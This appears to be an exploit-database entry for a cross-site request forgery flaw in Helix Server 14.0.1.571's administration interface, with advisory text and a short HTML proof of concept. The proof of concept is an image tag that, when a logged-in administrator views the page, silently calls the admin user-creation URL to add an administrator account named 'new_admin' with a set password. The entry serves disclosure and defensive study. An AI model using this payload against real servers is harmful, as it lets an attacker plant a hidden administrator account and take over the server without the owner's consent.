Helix Server 14.0.1.571 - Administration Interface Cross-Site Request Forgery

Author: John Leitch
type: remote
platform: multiple
port: 
date_added: 2010-12-10  
date_updated: 2014-10-28  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 35092.html  
source: https://www.securityfocus.com/bid/45340/info

Helix Server is prone to a cross-site request-forgery vulnerability.

An attacker can exploit this issue to perform unauthorized actions by enticing a logged-in user to visit a malicious site.

Helix Server 14.0.1.571 is vulnerable; other versions may also be affected.

<html>
    <body>
        <img src="http://www.example.com/admin/auth.adduser.html?respage=config_results.nc.html&name=new_admin&pass=Password1&realm=TESTBOX.AdminRealm" />
    </body>
</html>